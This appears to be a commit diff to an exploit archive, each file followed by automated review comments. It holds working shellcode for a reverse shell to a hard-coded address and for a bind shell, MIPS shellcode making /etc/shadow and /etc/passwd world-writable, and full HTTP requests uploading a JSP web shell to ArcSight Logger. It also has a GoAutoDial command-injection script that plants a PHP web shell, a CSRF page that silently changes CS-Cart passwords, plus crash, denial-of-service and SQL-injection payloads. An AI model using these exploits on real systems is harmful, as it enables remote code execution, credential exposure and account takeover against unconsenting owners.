; execve(/bin/sh, NULL , NULL);
push 0xb ; execve()
pop eax
cdq ; zero out edx
mov ecx, edx ; zero out ecx
push edx ; push null bytes (terminate string)
push 0x68732f2f ; //sh
push 0x6e69622f ; /bin
mov ebx, esp ; load address of /bin/sh
int 0x80 ; call execve()
*/
#include <stdio.h>
#include <string.h>
unsigned char code[] = \
"\x6a\x66\x58\x99\x52\x42\x52\x89\xd3\x42\x52\x89\xe1\xcd\x80\x93\x89\xd1\xb0"
"\x3f\xcd\x80\x49\x79\xf9\xb0\x66\x87\xda\x68"
"\xc0\xa8\x01\x85" // <--- ip address
"\x66\x68"
"\x82\x35" // <--- tcp port
"\x66\x53\x43\x89\xe1\x6a\x10\x51\x52\x89\xe1\xcd\x80\x6a\x0b\x58\x99\x89\xd1"
"\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
int main(void) {
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
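Review bot: the backslash after `unsigned char code[] =` is a stray line continuation outside any macro and should be deleted. The inline markers (`// <--- ip address`, `// <--- tcp port`) identify the hard-coded endpoint bytes, but the header comment should also spell out the address and port in readable form, as 36398.c does with its PORT_NUMBER macro, so a reader does not have to decode `\xc0\xa8\x01\x85` and `\x82\x35` by hand; `%d` with `strlen` should be `%zu`.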


@ -0,0 +1,104 @@
/*
* Linux x86 - TCP Bind Shell - 96 bytes
* Author: xmgv
* Details: https://xmgv.wordpress.com/2015/02/19/28/
*/
/*
global _start
section .text
_start:
xor ebx, ebx ; zero out ebx
mul ebx ; zero out eax, edx
; socket(AF_INET, SOCK_STREAM, 0);
mov al, 102 ; socketcall()
mov bl, 1 ; socket()
push edx ; protocol
push ebx ; SOCK_STREAM
push 2 ; AF_INET
mov ecx, esp ; load address of the parameter array
int 0x80 ; call socketcall()
; eax contains the newly created socket
mov esi, eax
; bind(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr));
mov al, 102 ; socketcall()
inc ebx ; bind() - 2
push edx ; INADDR_ANY
push word 0x3582 ; port
push word bx ; AF_INET
mov ecx, esp ; point to the structure
push 16 ; sizeof(struct sockaddr_in)
push ecx ; &serv_addr
push esi ; sockfd
mov ecx, esp ; load address of the parameter array
int 0x80 ; call socketcall()
; listen(sockfd, backlog);
mov al, 102 ; socketcall()
mov bl, 4 ; listen()
push edx ; backlog
push esi ; sockfd
mov ecx, esp ; load address of the parameter array
int 0x80 ; call socketcall()
; accept(sockfd, (struct sockaddr *)&cli_addr, &sin_size);
mov al, 102 ; socketcall()
mov bl, 5 ; accept()
push edx ; zero addrlen
push edx ; null sockaddr
push esi ; sockfd
mov ecx, esp ; load address of the parameter array
int 0x80 ; call socketcall()
; eax contains the descriptor for the accepted socket
xchg ebx, eax
xor ecx, ecx ; zero out ecx
mov cl, 2 ; initialize counter
loop:
; dup2(connfd, 0);
mov al, 63 ; dup2()
int 0x80
dec ecx
jns loop
; execve(/bin/sh, [/bin/sh, NULL], NULL);
xchg eax, edx
push eax ; push null bytes (terminate string)
push 0x68732f2f ; //sh
push 0x6e69622f ; /bin
mov ebx, esp ; load address of /bin/sh
push eax ; null terminator
push ebx ; push address of /bin/sh
mov ecx, esp ; load array address
push eax ; push null terminator
mov edx, esp ; empty envp array
mov al, 11 ; execve()
int 0x80 ; call execve()
*/
#include <stdio.h>
#include <string.h>
#define PORT_NUMBER "\x82\x35" // 33333
unsigned char code[] =
"\x31\xdb\xf7\xe3\xb0\x66\xb3\x01\x52\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0"
"\x66\x43\x52\x66\x68"
PORT_NUMBER
"\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56\x89"
"\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x93\x31\xc9\xb1\x02"
"\xb0\x3f\xcd\x80\x49\x79\xf9\x92\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
"\x89\xe3\x50\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80";
int main(void) {
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
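Review bot: `xchg eax, edx` under the execve comment is the one uncommented instruction in the listing and it carries a non-obvious invariant: edx is still 0 from `mul ebx` at that point (nothing between has written it), and the last dup2 returned 0 in eax, so the xchg leaves both registers zero, which the following `push eax` (terminator) and `mov al, 11` depend on. Add a comment stating that, since anyone editing the dup2 loop would silently break it. `%d` with `strlen` in main() should be `%zu`.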

platforms/linux/dos/36404.c Executable file

@ -0,0 +1,78 @@
source: http://www.securityfocus.com/bid/50898/info
GNU glibc is prone to an remote integer-overflow vulnerability.
An attacker can exploit this issue to execute arbitrary code with the privileges of the user running an application that uses the affected library.
#include <stdio.h>
#include <stdint.h>
#include <time.h>
#include <string.h>
#define TZ_MAGIC "TZif"
#define PUT_32BIT_MSB(cp, value) \
do { \
(cp)[0] = (value) >> 24; \
(cp)[1] = (value) >> 16; \
(cp)[2] = (value) >> 8; \
(cp)[3] = (value); \
} while (0)
struct tzhead {
char tzh_magic[4];
char tzh_version[1];
char tzh_reserved[15];
char tzh_ttisgmtcnt[4];
char tzh_ttisstdcnt[4];
char tzh_leapcnt[4];
char tzh_timecnt[4];
char tzh_typecnt[4];
char tzh_charcnt[4];
};
struct ttinfo
{
long int offset;
unsigned char isdst;
unsigned char idx;
unsigned char isstd;
unsigned char isgmt;
};
int main(void)
{
struct tzhead evil;
int i;
char *p;
uint32_t total_size;
uint32_t evil1, evil2;
/* Initialize static part of the header */
memcpy(evil.tzh_magic, TZ_MAGIC, sizeof(TZ_MAGIC) - 1);
evil.tzh_version[0] = 0;
memset(evil.tzh_reserved, 0, sizeof(evil.tzh_reserved));
memset(evil.tzh_ttisgmtcnt, 0, sizeof(evil.tzh_ttisgmtcnt));
memset(evil.tzh_ttisstdcnt, 0, sizeof(evil.tzh_ttisstdcnt));
memset(evil.tzh_leapcnt, 0, sizeof(evil.tzh_leapcnt));
memset(evil.tzh_typecnt, 0, sizeof(evil.tzh_typecnt));
/* Initialize nasty part of the header */
evil1 = 500;
PUT_32BIT_MSB(evil.tzh_timecnt, evil1);
total_size = evil1 * (sizeof(time_t) + 1);
total_size = ((total_size + __alignof__ (struct ttinfo) - 1)
& ~(__alignof__ (struct ttinfo) - 1));
/* value of chars, to get a malloc(0) */
evil2 = 0 - total_size;
PUT_32BIT_MSB(evil.tzh_charcnt, evil2);
p = (char *)&evil;
for (i = 0; i < sizeof(evil); i++)
printf("%c", p[i]);
/* data we overflow with */
for (i = 0; i < 50000; i++)
printf("A");
}
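Review bot: main() writes the binary header with `printf("%c", p[i])` one byte at a time while comparing the int `i` against `sizeof(evil)` (a size_t); `fwrite(&evil, sizeof evil, 1, stdout)` is the idiomatic way to emit a struct and avoids the signed/unsigned comparison. `__alignof__` is a GCC extension and should be noted in the header (or replaced by C11 `_Alignof`), and `int main(void)` falls off the end without `return 0`, which C99 permits but the other harnesses in this commit do not rely on.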

platforms/linux/local/36388.py Executable file

@ -0,0 +1,27 @@
#!/usr/bin/python
#Exploit title: Brasero 3.4.1 'm3u' Buffer Overflow POC
#Date Discovered: 15th March' 2015
# Exploit Author: Avinash Kumar Thapa "-Acid"
# Vulnerable Software: Brasero 3.4.1 CD/DVD for the Gnome Desktop
# Homepage:https://wiki.gnome.org/Apps/Brasero
# Tested on: Kali Linux 1.0.9
buffer ="A"*26109
buffer += "CCCC"
buffer += "D"*10500
file = "crash.m3u"
f = open(file, "w")
f.write(buffer)
f.close()
# After running exploit, run malicious file with brasero CD/DVD burner and check the crash which leads to logged out from your current session.
#####################################################################
# -Acid #
#####################################################################
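Review bot: `buffer` and `file` shadow Python builtins; rename them (e.g. `payload`, `path`) and use `with open(path, "w") as f:` so the handle is closed even on error. In the header, "Date Discovered: 15th March' 2015" has a stray apostrophe, and `#!/usr/bin/python` assumes a Python 2 interpreter at that path even though the script is version-neutral; `#!/usr/bin/env python` is the more portable choice.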

platforms/linux/remote/36370.txt Executable file

@ -0,0 +1,181 @@
# Exploit Title: ArcSight Logger - Arbitrary File Upload (Code Execution)
# Date: 13.03.2015
# Exploit Author: Julian Horoszkiewicz
# Vendor Homepage: www.hp.com
# Software Link: http://www8.hp.com/us/en/software-solutions/arcsight-logger-log-management/try-now.html
# Version: ArcSight Logger 5.3.1.6838.0 and prior versions
# Tested on: Red Hat Linux
# CVE: CVE-2014-7884
[ Description ]
Configuration import file upload capability does not fully sanitize file names, which allows attackers to put executable files into the document root. Upload of server side (JSP) script with shell accessing function in order to gain remote OS command execution has been conducted in the POC. To access vulnerable feature, user has to be authenticated in the console. Feature is available to all users, also non-administrative ones. Shell commands are executed with default NPA privileges (arcsight) giving full control over the service (for instance /etc/init.d/arcsight_logger stop has been successfully performed). The culprit feature is accessible to all authenticated users, including ones with sole read-only admin role.
[ Proof of Concept ]
Attention, to reproduce the attack for the first time, two requests are required.
First request magically creates subdirectory in the /opt/arcsight/current/backups upload dir.
Second one puts the actual JSP web shell into the document root, by using path traversal refering to the upload dir subdirectory.
Other combinations of direct name manipulation in order to upload anything to the document root did not succeed during the test (references to the upload dir without a subdirectory were refused by the application).
The only required difference between the requests to achieve successful upload into desired location is the filename property in the Content-Disposition HTTP header.
The general rule is as follows:
First request (create /opt/arcsight/current/backups/some_new_dir directory, the uploaded file is irrelevant):
Content-Disposition: form-data; name="field-importFile"; filename="some_new_dir/whatever"
Second request (upload the file into location of choice by traversally refering to that subdirectory):
Content-Disposition: form-data; name="field-importFile"; filename="some_new_dir/../../local/tomcat/webapps/logger/hellcode.jsp"
Please also note that valid tokens (asf_token, session_string, JSESSIONID) are required.
The most efficient way to reproduce this is:
1) name the local JSP web shell file toanything.xml.gz extension
2) choose to import it in the Configuration->Content Management->Import section through the web browser
3) intercept the browser traffic with a local proxy (Burp Suite for instance)
4) change the filename property in the Content-Disposition header so it contains the name of new subdirectory and forward the request
5) send another copy of the same request, this time with filename referring to the subdirectory created with previous request, using path traversal to point into the Logger document root, successfully uploading the web shell.
6) Navigate the browser to http://victim.com:9000/logger/hellcode.jsp
Full requests:
POST /logger/import_content_config_upload.ftl? HTTP/1.1
Host: victim.com:9000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://victim.com:9000/logger/import_content_config_upload.ftl?
Cookie: com.arcsight.product.platform.logger.client.session.SessionContext.productName=Logger; com.arcsight.product.platform.logger.client.session.SessionContext.arcsightProductName=ArcSight%20Logger; JSESSIONID=F89541D136E58EFD4B2377313B56B594; user_id_seq=7; session_string=TjF-x1fSWrKb3_tC0mYf7bQ3tVMaoD6kjmBItnWftsk.
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------17152166115305
Content-Length: 1565
-----------------------------17152166115305
Content-Disposition: form-data; name="uploadid"
-----------------------------17152166115305
Content-Disposition: form-data; name="update"
true
-----------------------------17152166115305
Content-Disposition: form-data; name="asf_token"
7caea3f1-7bfb-4419-a4bb-4a19e3800bff
-----------------------------17152166115305
Content-Disposition: form-data; name="field-importFile"; filename="some_new_dir/hellcode.jsp"
Content-Type: application/x-gzip
<%@ page import="java.util.*,java.io.*"%>
<HTML>
<TITLE>Laudanum JSP Shell</TITLE>
<BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send"><br/>
If you use this against a Windows box you may need to prefix your command with cmd.exe /c
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
<hr/>
<address>
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</BODY></HTML>
-----------------------------17152166115305--
POST /logger/import_content_config_upload.ftl? HTTP/1.1
Host: victim.com:9000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://victim.com:9000/logger/import_content_config_upload.ftl?
Cookie: com.arcsight.product.platform.logger.client.session.SessionContext.productName=Logger; com.arcsight.product.platform.logger.client.session.SessionContext.arcsightProductName=ArcSight%20Logger; JSESSIONID=F89541D136E58EFD4B2377313B56B594; user_id_seq=7; session_string=TjF-x1fSWrKb3_tC0mYf7bQ3tVMaoD6kjmBItnWftsk.
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------17152166115305
Content-Length: 1565
-----------------------------17152166115305
Content-Disposition: form-data; name="uploadid"
-----------------------------17152166115305
Content-Disposition: form-data; name="update"
true
-----------------------------17152166115305
Content-Disposition: form-data; name="asf_token"
7caea3f1-7bfb-4419-a4bb-4a19e3800bff
-----------------------------17152166115305
Content-Disposition: form-data; name="field-importFile"; filename="some_new_dir/../../local/tomcat/webapps/logger/hellcode.jsp"
Content-Type: application/x-gzip
<%@ page import="java.util.*,java.io.*"%>
<HTML>
<TITLE>Laudanum JSP Shell</TITLE>
<BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send"><br/>
If you use this against a Windows box you may need to prefix your command with cmd.exe /c
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
<hr/>
<address>
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</BODY></HTML>
-----------------------------17152166115305--
[ Time line ]
28.08.2014 - vulnerability report sent to HP
21.01.2015 - new version containing the fix released by HP
12.03.2015 - security bulletin published (CVE-2014-7884)
[ Credits ]
Julian Horoszkiewicz - IT Security Specialist @ ING Services Polska
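Review bot: both requests declare `Content-Length: 1565` although the second request's `filename=` value is much longer than the first's, so at least one length is wrong as transcribed; either fix the values or state that the intercepting proxy recomputes the header. The requests also carry what look like real session material (`JSESSIONID=F89541D1...`, `session_string=TjF-x1fS...`, the `asf_token` value `7caea3f1-...`); replace them with placeholders as was already done for the `victim.com` host. In the header, `# Version: ArcSight Logger 5.3.1.6838.0 and prior versions` together with the timeline entry `21.01.2015 - new version containing the fix released by HP` never names the first fixed build, which is what a defender needs to check an inventory. Finally, the [ Description ] says file names are "not fully sanitize[d]" but should spell out the mitigation that implies: reduce the uploaded name to its basename and reject any path separator or `..` component before it is joined to the backups directory.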


@ -0,0 +1,37 @@
#include <stdio.h>
/*
Title: Linux/MIPS (Little Endian) - chmod 666 /etc/shadow - 55 bytes
Date: 2015-03-05
Author: Sang-Min LEE
Email: leesangmin144@gmail.com
Blog: http://smleenull.tistory.com
*/
char sc[] = {
"\xff\xff\x06\x28" // slti $a2, $zero, -1
"\xff\xff\xd0\x04" // bltzal $a2, p <p>
"\xff\xff\x05\x28" // slti $a1, $zero, -1
"\xb6\x01\x05\x24" // li $a1, 438
"\x01\x10\xe4\x27" // addu $a0, $ra, 4097
"\x1f\xf0\x84\x24" // addu $a0, $a0, -4065
"\xaf\x0f\x02\x24" // li $v0, 4015
"\x0c\x01\x01\x01" // syscall 0x40404
"\xff\xff\x04\x28" // slti $a0, $zero, -1
"\xa1\x0f\x02\x24" // li $v0, 4001
"\x0c\x01\x01\x01" // syscall 0x40404
"/etc/shadow"
};
/*
Shellcode
\xff\xff\x06\x28\xff\xff\xd0\x04\xff\xff\x05\x28\xb6\x01\x05\x24\x01\x10\xe4\x27\x1f\xf0\x84\x24\xaf\x0f\x02\x24\x0c\x01\x01\x01\xff\xff\x04\x28\xa1\x0f\x02\x24\x0c\x01\x01\x01\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77
*/
void main ()
{
void (*s)(void);
printf("sc size %d\n", sizeof(sc));
s = sc;
s();
}
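Review bot: `void main ()` is not a valid signature for a hosted C program and `printf("sc size %d\n", sizeof(sc))` passes a `size_t` to `%d`; use `int main(void)` and `%zu`. The printed size will be 56, not the 55 the title claims, because the braced string literal adds a terminating NUL to `sc`. The disassembly comments on `"\x01\x10\xe4\x27"` and `"\x1f\xf0\x84\x24"` say `addu`, but an immediate operand means these words encode `addiu` (opcode 001001); the comments on the `li` lines already use the immediate form, so these two should match.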


@ -0,0 +1,37 @@
#include <stdio.h>
/*
Title: Linux/MIPS (Little Endian) - chmod 666 /etc/passwd - 55 bytes
Date: 2015-03-05
Author: Sang-Min LEE
Email: leesangmin144@gmail.com
Blog: http://smleenull.tistory.com
*/
char sc[] = {
"\xff\xff\x06\x28" // slti $a2, $zero, -1
"\xff\xff\xd0\x04" // bltzal $a2, p <p>
"\xff\xff\x05\x28" // slti $a1, $zero, -1
"\xb6\x01\x05\x24" // li $a1, 438
"\x01\x10\xe4\x27" // addu $a0, $ra, 4097
"\x1f\xf0\x84\x24" // addu $a0, $a0, -4065
"\xaf\x0f\x02\x24" // li $v0, 4015
"\x0c\x01\x01\x01" // syscall 0x40404
"\xff\xff\x04\x28" // slti $a0, $zero, -1
"\xa1\x0f\x02\x24" // li $v0, 4001
"\x0c\x01\x01\x01" // syscall 0x40404
"/etc/passwd"
};
/*
Shellcode
\xff\xff\x06\x28\xff\xff\xd0\x04\xff\xff\x05\x28\xb6\x01\x05\x24\x01\x10\xe4\x27\x1f\xf0\x84\x24\xaf\x0f\x02\x24\x0c\x01\x01\x01\xff\xff\x04\x28\xa1\x0f\x02\x24\x0c\x01\x01\x01\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64
*/
void main ()
{
void (*s)(void);
printf("sc size %d\n", sizeof(sc));
s = sc;
s();
}
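Review bot: this file duplicates the `/etc/shadow` variant except for the path string, and the same three corrections apply: `void main ()` should be `int main(void)`, `printf("sc size %d\n", sizeof(sc))` needs `%zu` for a `size_t`, and `sizeof(sc)` is 56 (the string literal's NUL is counted) while the title says 55 bytes. The `addu` comments on `"\x01\x10\xe4\x27"` and `"\x1f\xf0\x84\x24"` should read `addiu`, as the immediate operand implies.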


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/50854/info
CoDeSys is prone to multiple denial-of-service vulnerabilities.
An attacker can exploit these issues to crash the application and deny service to legitimate users.
udpsz -T -c "POST / HTTP/1.0\r\nContent-Length: 4294967295\r\n\r\n" SERVER 8080 -1
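Review bot: the advisory names neither an affected CoDeSys version nor the component that listens on port 8080, and `udpsz` is used without a reference to where the tool comes from, so the entry cannot be matched against an inventory. The request itself is a `POST` declaring `Content-Length: 4294967295` (2^32-1) with no body; the defensive fix this implies is a cap on the declared body length and a read timeout, so that an unfulfilled Content-Length is rejected rather than acted on.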


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/50854/info
CoDeSys is prone to multiple denial-of-service vulnerabilities.
An attacker can exploit these issues to crash the application and deny service to legitimate users.
udpsz -T -c "BLAH / HTTP/1.0\r\n\r\n" SERVER 8080 -1
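Review bot: the three description lines are copied verbatim from the preceding CoDeSys entry for the same BID 50854; the only substantive line is the request with the unknown method `BLAH`, and nothing says what about that method triggers the crash. Either merge the two requests into one advisory or explain the distinct trigger. The defensive check this points at is a strict HTTP method whitelist at the front end, with anything else answered by a 4xx rather than parsed further.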

58
platforms/php/webapps/36231.py Executable file

@ -0,0 +1,58 @@
# Title : GoAutoDial CE 2.0 Shell Upload
# Date : 28/02/2015
# Author : R-73eN
# Software : GoAutoDial CE 2.0
# Tested : On Linux vicisrv.loc 2.6.18-238.9.1.el5.goPAE #1 GoAutoDial CE 2.0
import socket
import sys
banner = "\n\n"
banner +=" ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
CRLF = "\r\n"
def checkvuln():
command = "uname"
evil = path + '/manager_send.php?enable_sipsak_messages=1&allow_sipsak_messages=1&protocol=sip&ACTION=OriginateVDRelogin&session_name=AAAAAAAAAAAA&server_ip=%27%20OR%20%271%27%20%3D%20%271&extension=%3B' + command + '%3B&user=' + user + '&pass=' + password
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,80))
evilREQ = 'GET ' + evil + ' HTTP/1.1' + CRLF + 'Host: ' + host + CRLF + 'User-Agent: Infogen-AL' + CRLF + CRLF + CRLF
s.send(evilREQ)
a = s.recv(1024)
if(a.find("HTTP/1.1 200 OK") != -1 and a.find("Linux") != -1):
print '[ + ] Server Is vulnerable [ + ]\n'
shellupload()
else:
print '[ - ] Server is not vulnerable [ - ]\n'
s.close()
def shellupload():
command = "echo 'Infogen-AL<br><?php echo system($_GET['cmd']);?>' > /var/www/html/infogen.php"
#command = "rm /var/www/html/123.pl;rm /var/www/html/TEST.perl"
command = command.replace(" ", "%20")
evil = path + '/manager_send.php?enable_sipsak_messages=1&allow_sipsak_messages=1&protocol=sip&ACTION=OriginateVDRelogin&session_name=AAAAAAAAAAAA&server_ip=%27%20OR%20%271%27%20%3D%20%271&extension=%3B' + command + '%3B&user=' + user + '&pass=' + password
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,80))
evilREQ = 'GET ' + evil + ' HTTP/1.1' + CRLF + 'Host: ' + host + CRLF + 'User-Agent: Infogen-AL' + CRLF + CRLF + CRLF
s.send(evilREQ)
a = s.recv(1024)
if(a.find("HTTP/1.1 200 OK") != -1 and a.find("Invalid") == -1):
print '[ + ] Shell uploaded successfully [ + ]\n'
print '[ + ] http://' + host + '/infogen.php [ + ]\n'
else:
print '[ - ] Shell upload failed.... [ - ]'
s.close()
if(len(sys.argv) < 4):
print '\n Usage : exploit.py 127.0.0.1 /goautodial-agent/ agentuser agentpassword\n'
else:
host = sys.argv[1]
path = sys.argv[2]
user = sys.argv[3]
password = sys.argv[4]
checkvuln()
print 'Visit Us : http://infogen.al/'
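Review bot: `if(len(sys.argv) < 4):` admits exactly four arguments, and then `password = sys.argv[4]` raises `IndexError`, since the script needs five (`exploit.py host path user password` per its own usage line); the check should be `< 5`. `a = s.recv(1024)` reads only the first 1024 bytes of each response, so the `a.find("Linux")` test in `checkvuln()` can miss content that arrives in a later segment; loop on `recv` until the server closes. `host`, `path`, `user` and `password` are assigned only in the module-level `else:` branch and read as globals inside the two functions, which works but should be passed as parameters. `print banner` and the other statement-form prints make the file Python 2 only; the header should say so.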

26
platforms/php/webapps/36242.txt Executable file

@ -0,0 +1,26 @@
# Exploit Title: [ wordpress theme photocrati 4.X.X SQL INJECTION ]
# Google Dork: [ Designed by Photocrati ] also [powered by Photocrati]
# Date: [23 / 09 / 2011 ]
# Exploit Author: [ ayastar ]
# Email : dmx-ayastar@hotmail.fr
# Software Link: [ http://www.photocrati.com ]
# Version: [4.X.X]
# Tested on: [ windows 7 ]
--------
details |
=======================================================
Software : photocrati
version : 4.X.X
Risk : High
remote : yes
attacker can do a remote injection in site URL to get some sensitive information .
almost all version are infected by this vunl.
=======================================================
Exploit code :
http://sitewordpress/wp-content/themes/[photocrati-Path-theme]/ecomm-sizes.php?prod_id=[SQL]
greetz to all muslims and all tryag member's
:) from morocco
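Review bot: `# Version: [4.X.X]` and `almost all version are infected by this vunl.` give no concrete affected or fixed release, and `# Date: [23 / 09 / 2011 ]` is more than three years older than this commit with no statement on whether current Photocrati releases are still affected; a vendor-contact or fixed-version line is missing entirely. Technically the entry identifies only `ecomm-sizes.php?prod_id=` as the injection point; the mitigation to state is casting the product id to an integer and binding it as a query parameter before it reaches the database.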

72
platforms/php/webapps/36243.txt Executable file

@ -0,0 +1,72 @@
# Exploit Title: WordPress: cp-multi-view-calendar.1.1.4 [SQL Injection
vulnerabilities]
# Date: 2015-02-28
# Google Dork: Index of /wordpress/wp-content/plugins/cp-multi-view-calendar
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://wordpress.dwbooster.com/
# Software Link:
https://downloads.wordpress.org/plugin/cp-multi-view-calendar.1.1.4.zip
# Version: 1.1.5
# Tested on: windows 7 ultimate + sqlmap 0.9. It's php aplication
# OWASP Top10: A1-Injection
# Mitigations: Upgrade to version 1.1.5
Greetz to Christian Uriel Mondragon Zarate
Video demo of unauthenticated user sqli explotation vulnerability :
###################################################################
ADMIN PAGE SQL INJECTION
-------------------------------------------------
http://localhost/wordpress/wp-admin/admin-ajax.php?action=ajax_add_calendar
sqlinjection in post parameter viewid
-------------------------------------------------------------------
http://localhost/wordpress/wp-admin/admin-ajax.php?action=ajax_delete_calendar
sqlinjection in post parameter id
########################################
UNAUTENTICATED SQL INJECTION
-----------------------------------------------------------------
http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1
sql injection in id parameter
-----------------------------------------------------------------------
http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1
datapost viewtype=list&list_order=asc vuln variable list_order
################################################################
CROSSITE SCRIPTING VULNERABILITY
----------------------------------------------------------
http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&weekstartday=alert(12)&f=edit&id=1
crosite script weekstartday parameter
###################################################
==================================
time-line
26-02-2015: vulnerabilities found
27-02-2015: reported to vendor
28-02-2015: release new cp-multi-view-calendar version 1.1.4
28-02-2015: full disclousure
===================================
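Review bot: the version lines contradict each other: the title says `cp-multi-view-calendar.1.1.4`, then `# Version: 1.1.5`, `# Mitigations: Upgrade to version 1.1.5`, and the timeline says `28-02-2015: release new cp-multi-view-calendar version 1.1.4`. State the affected version and the fixed version once, consistently. `Video demo of unauthenticated user sqli explotation vulnerability :` ends without a link. The cross-site scripting item (`weekstartday=alert(12)`) is filed under a SQL injection title and should be named in the title or split out. For mitigation, `id`, `viewid` and `calid` should be bound as integers through `$wpdb->prepare()`, and `list_order` compared against the fixed set `asc`/`desc` rather than interpolated into the query.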


@ -0,0 +1,41 @@
# Exploit Title: CS-Cart 4.2.4 CSRF
# Google Dork: intext:"© 2004-2015 Simtech"
# Date: March 11, 2015
# Exploit Author: Luis Santana
# Vendor Homepage: http://cs-cart.com
# Software Link: https://www.cs-cart.com/index.php?dispatch=pages.get_trial&page_id=297&edition=ultimate
# Version: 4.2.4
# Tested on: Linux + PHP
# CVE : [if one exists, or other VDB reference]
Standard CSRF, allow you to change a users's password. Fairly lame but I noticed no one had reported this bug yet.
Exploit pasted below and attached.
<html>
<head>
<title>CS-CART CSRF 0day Exploit</title>
</head>
<body>
<!-- Discovered By: Connection
Exploit By: Connection
Blacksun Hacker's Club
irc.blacksunhackers.com #lobby
-->
<form action="http://<victim>/cscart/profiles-update/?selected_section=general" method="POST" id="CSRF" style="visibility:hidden">
<input type="hidden" name="user_data[email]" value="hacked@lol.dongs" />
<input type="hidden" name="user_data[password1]" value="CSRFpass" />
<input type="hidden" name="user_data[password2]" value="CSRFpass" />
<input type="hidden" name="user_data[profile_name]" value="Concept" />
<input type="hidden" name="dispatch[profiles.update]" value="" />
</form>
<script>
document.getElementById("CSRF").submit();
</script>
</body>
</html>
Luis Santana - Security+
Administrator - http://hacktalk.net
HackTalk Security - Security From The Underground
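Review bot: `# CVE : [if one exists, or other VDB reference]` is the unfilled template line; fill it in or drop it. The HTML comment credits `Discovered By: Connection` while the header says `Exploit Author: Luis Santana`; if these are the same person, say so once. `# Tested on: Linux + PHP` gives no PHP or CS-Cart build detail beyond the `4.2.4` in the header, and `a users's password` should read `a user's password`. The defensive fix the advisory implies but never states is that the `profiles.update` dispatch must require a per-session anti-CSRF token and the current password before `user_data[password1]` / `user_data[password2]` are accepted.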

42
platforms/php/webapps/36368.txt Executable file

@ -0,0 +1,42 @@
#Vulnerability title: Community Gallery - Stored Cross-Site Scripting
vulnerability
#Product: Community Gallery
#Vendor: https://www.woltlab.com
#Affected version: Community Gallery 2.0 before 12/10/2014
#Download link:
https://www.woltlab.com/purchase/?products[]=com.woltlab.gallery
#Fixed version: Community Gallery 2.0 after 12/26/2014
#CVE ID: CVE-2015-2275
#Author: Pham Kien Cuong (cuong.k.pham (at) itas (dot) vn [email concealed]) & ITAS Team (www.itas.vn)
::PROOF OF CONCEPT::
+ REQUEST:
POST /7788bdbc/gallery/index.php/AJAXProxy/?t=7d53f8ad7553c0f885e3ccb60edbc0b6512d9eed HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
